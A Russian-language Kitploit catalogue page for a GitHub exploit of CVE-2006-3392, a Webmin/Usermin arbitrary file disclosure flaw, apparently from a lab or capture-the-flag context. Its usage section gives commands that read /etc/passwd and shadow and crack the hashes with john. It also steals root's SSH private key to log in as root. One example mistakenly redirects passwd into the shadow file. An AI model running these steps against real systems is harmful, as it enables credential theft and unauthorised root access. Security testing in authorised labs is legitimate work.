Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/g1vi/cve-2006-3392
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubg1vi/cve-2006-3392

CVE-2006-3392

Webmin < 1.290 / Usermin < 1.220 - Произвольное раскрытие файлов

Репозиторий
122 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2006-3392

https://www.cvedetails.com/cve/CVE-2006-3392/

Webmin версий до 1.290 и Usermin версий до 1.220 вызывают функцию simplify_path до декодирования HTML, что позволяет удалённым злоумышленникам читать произвольные файлы, как показано на примере использования последовательностей "..%01", которые обходят удаление последовательностей "../" до того, как байты, такие как "%01", удаляются из имени файла. ПРИМЕЧАНИЕ: Это другая проблема, нежели CVE-2006-3274.

Использование

Просмотр любого файла в файловой системе с правами root

root@kitploit:~
./exploit.sh <target ip> <target port> <file to disclose>

Примеры

Просмотр файлов passwd и shadow на 10.10.11.105, объединение (unshadow) и взлом хэшей

root@kitploit:~
./exploit.sh 10.10.11.105 10000 /etc/passwd > passwd
./exploit.sh 10.10.11.105 10000 /etc/passwd > shadow
unshadow passwd shadow > unshadowed
john --wordlist=<your fave wordlist here> unshadowed

Просмотр закрытого ключа RSA на 10.10.11.105

root@kitploit:~
./exploit.sh 10.10.11.105 10000 /root/.ssh/id_rsa > private_key
chmod 600 ./private_key
ssh -i private_key [email protected]

Лицензия

Не стесняйтесь использовать или изменять когда и где угодно

Скачать инструмент